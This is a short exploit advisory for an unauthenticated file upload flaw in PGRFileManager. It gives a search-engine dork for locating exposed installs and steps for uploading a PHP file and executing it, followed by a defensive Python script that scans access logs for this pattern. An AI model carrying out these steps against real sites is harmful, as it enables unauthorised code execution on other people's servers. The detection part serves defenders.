PGRFileManager arbitrary file upload
/////////////////////////////////////////////////
# Exploit Title: PGRFileManager arbitrary file upload
# Google Dork: inurl:/pgrfilemanager/ index of
# Date: -
# Exploit Author: -
# Team: -
# Vendor Homepage: http://pgrfilemanager.sourceforge.net/
# Tested on: Mozilla Firefox 40.0, Windows 7 Ultimate x64
************************************************
{+} Search for the dork in Google or another search engine
{+} Open the target
{+} Exploit: localhost/path/pgrfilemanager/php/upload.php
{+} Vulnerable? The page is blank
{+} open CSRF HERE
POST file field = Filedata
Upload a file with extension php, html, jpg or other (extension bypass)
{+} Access the file: localhost/path/pgrfilemanager/userfiles/namefile.php
***********************************************
thanks to Zi-slow
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
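
For defenders, the request sequence above (a request to php/upload.php, then a fetch of a script file under userfiles/) leaves a recognisable trail in web server access logs. The following is an added example, not part of the original advisory or of PGRFileManager; it assumes Apache/nginx "combined" log format, and the function name and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Paths are taken from the advisory; the "combined" log format is an assumption.
UPLOAD_RE = re.compile(r"/pgrfilemanager/php/upload\.php(?:\?|$)", re.I)
USERFILE_RE = re.compile(
    r"/pgrfilemanager/userfiles/[^?]*\.(?:php\d?|phtml|phar|html?)(?:\?|$)", re.I)
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /site/pgrfilemanager/php/upload.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "POST /site/pgrfilemanager/php/upload.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2024:10:00:15 +0000] "GET /site/pgrfilemanager/userfiles/namefile.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.20 - - [01/Jan/2024:10:02:00 +0000] "GET /site/pgrfilemanager/userfiles/logo.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.20 - - [01/Jan/2024:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

def find_upload_abuse(log_text):
    """Return {client_ip: [findings]} for the request pattern the advisory describes."""
    findings = defaultdict(list)
    posted = set()  # clients that have already POSTed to upload.php
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, ts, method, path, status = m.groups()
        if UPLOAD_RE.search(path):
            if method == "POST":
                posted.add(ip)
                findings[ip].append(("upload_post", ts, path, status))
            else:
                # Direct GET of the upload handler (the "blank page" check)
                findings[ip].append(("upload_probe", ts, path, status))
        elif USERFILE_RE.search(path) and status.startswith("2"):
            # A script or HTML file served from the upload directory
            kind = "script_fetch_after_upload" if ip in posted else "script_fetch"
            findings[ip].append((kind, ts, path, status))
    return dict(findings)

if __name__ == "__main__":
    for ip, events in find_upload_abuse(SAMPLE_LOG).items():
        for kind, ts, path, status in events:
            print(f"{ip} {kind} [{ts}] {path} -> {status}")
```

Any script_fetch hit with a 2xx status means the web server is serving script or HTML content out of the upload directory, which is worth investigating even without a matching POST in the retained logs.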